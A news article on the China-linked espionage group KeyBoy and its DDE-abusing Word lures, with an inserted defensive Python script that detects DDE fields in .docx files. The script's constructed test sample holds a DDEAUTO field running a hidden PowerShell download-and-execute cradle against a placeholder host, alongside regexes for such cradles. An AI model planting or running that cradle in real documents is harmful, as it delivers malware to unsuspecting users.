Chinese KeyBoy Group Unlocks More Victim Networks


Security researchers have discovered Chinese APT group KeyBoy back on the scene with new tools and techniques targeting Western organizations.

It has been around a year since the group was last seen, according to PwC threat intelligence analyst Bart Parys.

“KeyBoy is believed by the industry to be a hacking group based in or operating from China, and is mainly engaged in espionage activity,” he explained in a blog post.

“In the past it has targeted organizations and individuals in Taiwan, Tibet, and the Philippines, but in its latest campaign, KeyBoy appears to have expanded its targeting, as it now appears to be going after mostly Western organizations, likely for corporate espionage purposes.”

The group was observed delivering its malware with a specially crafted Microsoft Word document that abuses the Dynamic Data Exchange (DDE) protocol to fetch remote payloads, rather than relying on macros.

In the example given, the payload is a fake DLL downloaded by PowerShell.

Once the malware has been installed, the original DLL is deleted and pop-ups are suppressed on the machine, so the user has no indication that anything has happened.
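A check a defender would want after reading the above is a way to find DDE fields in Word documents without opening them in Word. The Python script below is an added example written for this page; it is not PwC's tooling and does not reproduce the actual KeyBoy lure. It unpacks a .docx, joins each field's w:instrText runs (attackers split the DDEAUTO keyword across several runs to defeat naive string matching) and flags fields that invoke DDE, noting whether they call PowerShell. The sample document it scans is constructed in memory, and the URL in it is hypothetical.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# DDE or DDEAUTO as a whole word inside a field instruction.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
# Typical PowerShell download/execute cradle markers.
PS_RE = re.compile(
    r"powershell|downloadstring|downloadfile|invoke-expression|\biex\b",
    re.IGNORECASE,
)


def extract_field_codes(part_xml: bytes) -> List[str]:
    """Return every field instruction found in one WordprocessingML part.

    Complex fields are sequences of w:fldChar begin / w:instrText ... / w:fldChar end,
    and the instruction may be spread over many w:instrText runs, so runs are joined
    per field before matching. Simple fields carry the instruction in the w:instr
    attribute of w:fldSimple. root.iter() walks in document order.
    """
    root = ET.fromstring(part_xml)
    fields: List[str] = []
    current = None  # instrText runs of the field currently open
    for el in root.iter():
        if el.tag == W + "fldSimple":
            instr = el.get(W + "instr")
            if instr:
                fields.append(instr.strip())
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                current = []
            elif kind == "end" and current is not None:
                fields.append("".join(current).strip())
                current = None
        elif el.tag == W + "instrText" and current is not None:
            current.append(el.text or "")
    if current:  # unterminated field: still worth inspecting
        fields.append("".join(current).strip())
    return fields


def scan_docx(data: bytes) -> List[Dict[str, object]]:
    """Scan every XML part under word/ (body, headers, footers) for DDE fields."""
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            for code in extract_field_codes(zf.read(name)):
                if DDE_RE.search(code):
                    findings.append({
                        "part": name,
                        "field": code,
                        "powershell": bool(PS_RE.search(code)),
                    })
    return findings


def build_sample_docx(field_runs: List[str]) -> bytes:
    """Constructed test input: a minimal .docx with one complex field whose
    instruction is split over the given w:instrText runs. Not a real lure."""
    runs = "".join(
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % escape(r)
        for r in field_runs
    )
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>%s'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>Loading...</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>' % (W_NS, runs)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # placeholder, not a full package
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed sample: the DDEAUTO keyword is split across runs and the command
# launches a PowerShell download cradle against a hypothetical host.
SAMPLE_RUNS = [
    "DDE",
    "AUTO c:\\\\windows\\\\system32\\\\cmd.exe ",
    '"/k powershell -w hidden -c IEX (New-Object Net.WebClient)'
    ".DownloadString('http://example.invalid/stage2.ps1')\"",
]

if __name__ == "__main__":
    for hit in scan_docx(build_sample_docx(SAMPLE_RUNS)):
        print(hit)
```

A benign field such as PAGE produces no finding, while the split DDEAUTO field is reported once with powershell set to true. Because the check reads field instructions rather than the rendered text, the "Loading..." placeholder shown to the user has no effect on the result.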

The malware is designed to take screenshots, gather system information, browse and download files, shut down and reboot victim machines, and use custom SSL libraries to hide its command-and-control (C&C) traffic.

PwC claimed the group is capable of at least a medium level of technical and operational know-how.

“Several connections can be made to CitizenLab’s report from 2016, such as the continued usage of fake services and related DLLs, powerful capabilities, several exports and strings present in the (sometimes decrypted) DLLs, as well as campaign or version identifiers which are reminiscent and consistent with earlier reported identifiers”, it added.

We reported on the group as far back as 2013, when it was targeting victims in Southeast Asia via malicious Word documents.

PwC has published a list of potential indicators of compromise for security teams to check.
